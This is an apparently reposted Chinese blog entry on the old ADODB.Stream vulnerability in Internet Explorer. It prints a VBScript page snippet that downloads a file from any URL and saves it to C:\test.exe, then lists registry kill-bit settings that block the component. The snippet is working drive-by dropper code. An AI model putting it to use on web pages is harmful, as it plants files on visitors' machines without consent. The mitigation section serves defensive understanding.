zoukankan      html  css  js  c++  java
  • ADODB.Stream漏洞

    ADODB.stream漏洞简介

    <script language=vbscript>
      const adTypeBinary=1
      const adSaveCreateOverwrite=2
      const adModeReadWrite=3
      set xmlHTTP=createObject("microsoft.xmlHTTP")
      xmlHTTP.open "GET","目标URL,可以是任意文件",false   '最后一个参数是设置是否异步访问
      xmlHTTP.send
      contents=xmlHTTP.responseBody  '这里是关键,也可以不用xmlHTTP对象,用HTTP也可以,
                                                            '但要返回有文件的内容
      set oStr=createObject("ADODB.stream")
      oStr.mode=adModeReadWrite
      oStr.Type=adTypeBinary
      oStr.open
      ostr.write(contents)   '前面返回的内容
      oStr.savetofile "C:\\test.exe",adSaveCreateOverwrite
    </script>
      

    如何防范?
    1下载专杀工具,估计也是卸载adodb.stream

    2改注册表

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

    Explorer\ActiveX Compatibility\{4B106874-DD36-11D0-8B44-00A024DD9EFF}
    里dword值Compatibility Flags=0x00000400

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

    Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}

    里dword值Compatibility Flags=0x00000400
    第一个是adodb.stream2.5 第二个是2.7
    这样 Internet Explorer 识别此注册表项时,Internet Explorer 不允许在浏览器中启动此组件。

  • 相关阅读:
    ORACLE DROP TABLE和truncate table的区别
    C#版链表加强版
    C#版栈
    再谈为什么要使用MONO
    流浪猫伏击大白鹅
    编写ASP.NET复合控件实例
    C# 大文件拷贝
    关于团队项目构架设计的疑问
    在Windows平台下使用MONO
    C#版链表
  • 原文地址:https://www.cnblogs.com/goodloop/p/295758.html
Copyright © 2011-2022 走看看